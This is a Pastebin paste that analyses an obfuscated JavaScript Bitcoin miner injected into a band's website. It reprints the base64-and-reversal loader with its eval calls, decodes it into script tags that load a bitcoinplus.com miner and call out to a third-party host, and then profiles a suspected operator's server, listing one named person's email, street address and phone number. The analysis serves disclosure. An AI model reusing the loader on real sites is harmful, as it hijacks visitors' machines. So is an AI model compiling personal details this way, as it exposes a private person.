Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* //////////////////////////////////////////////////////////////////////////////
- URL: http://www.anti-flag.com/?page_id=46
- What: BitcoinPlus.com Miner
- (Code in bottom of page):
- ////////////////////////////////////////////////////////////////////////////// */
- var _001='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKs90ToQGbph2Qk5WZwBXYuATSx8lC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACMJFzXgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuI3b0F2YzVnZi9GbtRHaukGch9yL6AHd0h2Jg0DIjJ3cuw2TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ACbP9EIyFmd7cSRzUCdwlmcjN3LDNTJ5ITJyITJ3QjMyIDNxIjMyUCOyUicl5WaNNXdsBlbp92Y0lmQFNTJyITJ0BXayN2chZXYq9Cd4VGdyITJENTJlBXe0BjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLyVmbp12Lzp2Lt92YuMXdsBnbp92Y0lmYuc3d39yLBNTJwRHdoJjMlQ0MlMmczBjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLulWbuknclVXcq9SMuYjLx8SeyVWdxp2LzJWas9CehpWYv02bj5ycpBXYlx2Zv92ZugXYqF2LvE0MlAHd0hmMyUCRzUyYyNHMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
- var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];
- function IOO(data){
- var OO0lOI=_0x84de[0];
- var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];
- do{
- h1=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
- h2=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
- h3=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
- h4=OO0lOI[_0x84de[3]](data[_0x84de[2]](i++));
- bits=h1<<18|h2<<12|h3<<6|h4;
- o1=bits>>16&0xff;
- o2=bits>>8&0xff;
- o3=bits&0xff;
- if(h3==64){
- enc+=String[_0x84de[4]](o1);
- }else{
- if(h4==64){
- enc+=String[_0x84de[4]](o1,o2);
- }else{
- enc+=String[_0x84de[4]](o1,o2,o3);
- };
- };
- }
- while(i<data[_0x84de[5]]);
- return enc;
- };
- function OO0(string){
- var ret=_0x84de[1],i=0;
- for(i=string[_0x84de[5]]-1;i>=0;i--){
- ret+=string[_0x84de[2]](i);
- };
- return ret;
- };
- eval(IOO(OO0(_001)));
- /* //////////////////////////////////////////////////////////////////////////////
- Unpacking & Renaming:
- ////////////////////////////////////////////////////////////////////////////// */
- var _obfuscated='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKs90ToQGbph2Qk5WZwBXYuATSx8lC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl1WZsVEdldmL05WZtV3YvRGI9ACMJFzXgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuI3b0F2YzVnZi9GbtRHaukGch9yL6AHd0h2Jg0DIjJ3cuw2TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ACbP9EIyFmd7cSRzUCdwlmcjN3LDNTJ5ITJyITJ3QjMyIDNxIjMyUCOyUicl5WaNNXdsBlbp92Y0lmQFNTJyITJ0BXayN2chZXYq9Cd4VGdyITJENTJlBXe0BjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLyVmbp12Lzp2Lt92YuMXdsBnbp92Y0lmYuc3d39yLBNTJwRHdoJjMlQ0MlMmczBjMlQHcpJ3YzN0MlEEMlU0MlQHcpJ3Yz9yQzUSRzUiMyUCdwlmcjNXY2FmavQHelRnMyUCRzUSZwlHdwITJyITJzpmLulWbuknclVXcq9SMuYjLx8SeyVWdxp2LzJWas9CehpWYv02bj5ycpBXYlx2Zv92ZugXYqF2LvE0MlAHd0hmMyUCRzUyYyNHMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
- function unpack1(data){
- var chars="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
- var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc="";
- do{
- h1=chars.indexOf(data.charAt(i++));
- h2=chars.indexOf(data.charAt(i++));
- h3=chars.indexOf(data.charAt(i++));
- h4=chars.indexOf(data.charAt(i++));
- bits=h1<<18|h2<<12|h3<<6|h4;
- o1=bits>>16&0xff;
- o2=bits>>8&0xff;
- o3=bits&0xff;
- if(h3==64){
- enc+=String.fromCharCode(o1);
- }else{
- if(h4==64){
- enc+=String.fromCharCode(o1,o2);
- }else{
- enc+=String.fromCharCode(o1,o2,o3);
- };
- };
- }while(i<data.length);
- return enc;
- };
- function unpack2(string){
- var ret="",i=0;
- for(i=string.length-1; i>=0; i--){
- ret += string.charAt(i);
- };
- return ret;
- };
- eval(unpack1(unpack2(_obfuscated)));
- /* //////////////////////////////////////////////////////////////////////////////
- Let's find the person behind (running the "eval"):
- ////////////////////////////////////////////////////////////////////////////// */
- var _escape='<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script><script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script><script type="text/javascript">BitcoinPlusMiner("21422247")</script>';
- var OOl = document.createElement('script');
- OOl.src = 'http://api.htmlobfuscator.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
- var _1I0 = document.getElementsByTagName('head')[0];
- _1I0.appendChild(OOl);
- document.write(unescape(_escape));
- /*
- BitcoinPlusMiner("21422247")
- Which is someone using the name "John R."
- *COULD _MAYBE_ BE THE OWNER OF THIS DOMAIN*
- virtuoso-luxury.info
- /go.php?sid=1 (<-- redirect to got.php)
- /got.php?sid=1 (<-- redirect to google)
- login.php (<-- blank page)
- /panel/ (<-- https = ISPmanager-Pro control panel)
- https://virtuoso-luxury.info
- -> HTTP: nginx/0.8.54, PHP/5.2.17
- -> SSL Cert: atservers.net
- --> Tyagunov, Oleg oleg@active.by
- --> per. 2-j Velosipednyj., dom 32, ofis 8
- --> Minsk, 220033
- --> +375.293777935
- -> SMTP: ru109.activeby.net
- -> FTP: Pure-FTPd
- -> SSH: SSH-1.99-OpenSSH_4.3
- -> MySQL: Remote login allowed (not vuln. to CVE-2012-2122)
- */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement